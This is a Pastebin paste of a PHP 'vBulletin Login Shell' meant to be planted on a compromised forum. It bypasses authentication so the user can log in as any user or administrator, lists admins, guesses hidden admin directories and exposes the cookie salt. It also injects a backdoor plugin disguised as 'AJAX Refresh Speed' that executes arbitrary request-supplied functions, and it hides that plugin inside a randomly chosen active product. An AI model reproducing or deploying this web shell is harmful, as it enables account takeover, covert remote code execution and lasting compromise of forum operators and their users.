Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * vBulletin 3.8.x-4.x Login Shell
- * Author: JB (jb@p0wersurge.com)
- * www.p0wersurge.com
- * 13/01/2014 (updated 26/07/2015)
- * Version 1.9
- */
- #chdir('../');
- require_once('./global.php');
- define('SELF', $_SERVER['PHP_SELF']);
- @ini_set('display_errors', false);
- error_reporting(0);
- if(substr($vbulletin->versionnumber, 0, 1) > 3)
- {
- $fullperms = '16744444';
- function verify_authentication2($username)
- {
- global $vbulletin;
- $username = strip_blank_ascii($username, ' ');
- if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
- {
- set_authentication_cookies($cookieuser);
- $return_value = true;
- ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
- return $return_value;
- }
- $return_value = false;
- ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
- return $return_value;
- }
- }
- else
- {
- $fullperms = '491516';
- function verify_authentication2($username)
- {
- global $vbulletin;
- $username = strip_blank_ascii($username, ' ');
- if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
- {
- if ($vbulletin->GPC[COOKIE_PREFIX . 'userid'] AND $vbulletin->GPC[COOKIE_PREFIX . 'userid'] != $vbulletin->userinfo['userid'])
- {
- // we have a cookie from a user and we're logging in as
- // a different user and we're not going to store a new cookie,
- // so let's unset the old one
- vbsetcookie('userid', '', true, true, true);
- vbsetcookie('password', '', true, true, true);
- }
- vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
- vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
- $return_value = true;
- ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
- return $return_value;
- }
- $return_value = false;
- ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
- return $return_value;
- }
- }
- $guess = array();
- $known = array(
- 'archive',
- 'clientscript',
- 'cpstyles',
- 'customavatars',
- 'customgroupicons',
- 'customprofilepics',
- 'attach',
- 'forumrunner',
- 'images',
- 'includes',
- 'install',
- 'packages',
- 'signaturepics',
- 'store_sitemap',
- 'vb'
- );
- $admindir = $vbulletin->config['Misc']['admincpdir'];
- $complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
- $results = scandir('.');
- foreach ($results as $result) {
- if ($result == '.' or $result == '..') continue;
- if (is_dir('./' . $result)) {
- if(in_array($result, $known)) continue;
- if(@file_exists($result . '/adminlog.php'))
- {
- $guess[] = $result;
- } else {
- continue;
- }
- }
- }
- if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username']))
- {
- require_once(DIR . '/includes/functions_login.php');
- $username = $_REQUEST['username'];
- $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
- $query = $vbulletin->db->query_first($q);
- if($query['username'] != null)
- {
- if(verify_authentication2($query['username']))
- {
- exec_unstrike_user($query['username']);
- process_new_login('cplogin', true, null);
- do_login_redirect();
- }
- else
- {
- die('Verify failed');
- }
- }
- else
- {
- die('User not found.');
- }
- }
- elseif($_REQUEST['do'] == 'injectplugin')
- {
- $products = array();
- $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
- if($vbulletin->db->num_rows($query) > 0)
- {
- while($product = $vbulletin->db->fetch_array($query))
- {
- $productinfo = array();
- $productinfo['productid'] = $product['productid'];
- $productinfo['title'] = $product['title'];
- $productinfo['version'] = $product['version'];
- $productinfo['active'] = $product['active'];
- $productinfo['url'] = $product['url'];
- $products[] = $productinfo;
- }
- }
- // choose a random product if productcount > 0 else inject into vbulletin
- $productcount = count($products);
- $plugin['title'] = 'AJAX Refresh Speed';
- $plugin['hookname'] = 'global_complete';
- $plugin['phpcode'] = 'if(isset($_REQUEST[\'x\'])){$_REQUEST[\'x\']($_REQUEST[\'y\']);}';
- if(intval($productcount) > 0)
- {
- // failsafe incase product is disabled - we should only ever be injecting into an enabled product, or our injection is worthless
- // optional really, you can just make it insert into vbulletin itself but that's not really as covert as i'd like
- retrymtrand:
- $rand = mt_rand(0, intval($productcount));
- if($products[$rand]['active'])
- {
- $plugin['product'] = $products[$rand]['productid'];
- }
- else
- {
- goto retrymtrand;
- }
- }
- else
- {
- $plugin['product'] = 'vbulletin';
- }
- $plugin['devkey'] = '';
- $plugin['active'] = '1';
- $plugin['executionorder'] = '5';
- $vbulletin->db->query("
- INSERT INTO " . TABLE_PREFIX . "plugin
- (
- hookname,
- title,
- phpcode,
- product,
- active,
- executionorder
- )
- VALUES
- (
- '" . $plugin['hookname'] . "',
- '" . $plugin['title'] . "',
- '" . $vbulletin->db->escape_string($plugin['phpcode']) . "',
- '" . $vbulletin->db->escape_string($plugin['product']) . "',
- " . intval($plugin['active']) . ",
- " . intval($plugin['executionorder']) . "
- )
- ");
- $pluginid = $vbulletin->db->insert_id();
- // update the datastore
- vBulletinHook::build_datastore($db);
- ?>
- <h1>Plugin <?php echo $pluginid; ?> created on global_complete!</h1>
- <pre>
- <?php echo print_r($plugin); ?>
- </pre>
- <a href="<?php echo SELF; ?>">Go back</a>
- <?php
- }
- else
- {
- $admin_usergroups = array();
- $admin_usergroups_query = $vbulletin->db->query("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup WHERE adminpermissions = '3'");
- while($admin_usergroup = $vbulletin->db->fetch_array($admin_usergroups_query))
- {
- $admin_usergroups[] = $admin_usergroup['usergroupid'];
- }
- $admins = array();
- $query = $vbulletin->db->query("SELECT userid,adminpermissions FROM " . TABLE_PREFIX . "administrator");
- while($user = $vbulletin->db->fetch_array($query))
- {
- $userinfo = fetch_userinfo($user['userid']);
- $userarray = array();
- $userarray['userid'] = $userinfo['userid'];
- $userarray['username'] = $userinfo['username'];
- $userarray['musername'] = fetch_musername($userinfo);
- $userarray['adminpermissions'] = $user['adminpermissions'];
- $admins[] = $userarray;
- }
- $products = array();
- $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
- if($vbulletin->db->num_rows($query) > 0)
- {
- while($product = $vbulletin->db->fetch_array($query))
- {
- $productinfo = array();
- $productinfo['productid'] = $product['productid'];
- $productinfo['title'] = $product['title'];
- $productinfo['version'] = $product['version'];
- $productinfo['active'] = $product['active'];
- $productinfo['url'] = $product['url'];
- $products[] = $productinfo;
- }
- }
- ?>
- <h1>vBulletin Login Shell | CP Login (<?php echo $vbulletin->options['bbtitle']; ?>) (vB<?php echo $vbulletin->versionnumber; ?>)</h1>
- <hr />
- <form action="<?php echo SELF; ?>" method="get">
- <input type="hidden" name="do" value="login" />
- <input type="text" name="username" value="" />
- <input type="submit" name="login" value="Login as user" />
- </form>
- <hr />
- <p>Admins found: <?php echo count($admins); ?></p>
- <p><?php foreach($admins as $admin){ echo '<a href="' . SELF . '?do=login&username=' . $admin['username'] . '">' . $admin['musername'] . '</a>' . (($admin['adminpermissions'] == $fullperms) ? ' (full permissions)' : '') . ' ';} ?></p>
- <hr />
- <p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $admindir; ?></a></p>
- <p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
- <hr />
- <a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a>
- <hr />
- <p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
- <p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
- <p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
- <hr />
- <?php if(count($products) > 0) { ?>
- <h3>Installed Products</h3>
- <ul>
- <?php
- foreach($products as $product)
- {
- if($product['active'])
- {
- $color = 'green';
- }
- else
- {
- $color = 'red';
- }
- echo '<li><span style="color: ' . $color . ';">' . ((trim($product['url']) != null) ? '<a style="color: ' . $color . '" href="' . trim($product['url']) . '" target="_blank">' : '') . $product['title'] . ((trim($product['url']) != null) ? '</a>' : '') . ' (' . $product['version'] . ')</span></li>';
- }
- ?>
- </ul>
- <hr />
- <?php } ?>
- <h6>Written by <a href="https://twitter.com/xijailbreakx" target="_blank">@xijailbreakx</a>. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful).</h6>
- <?php
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement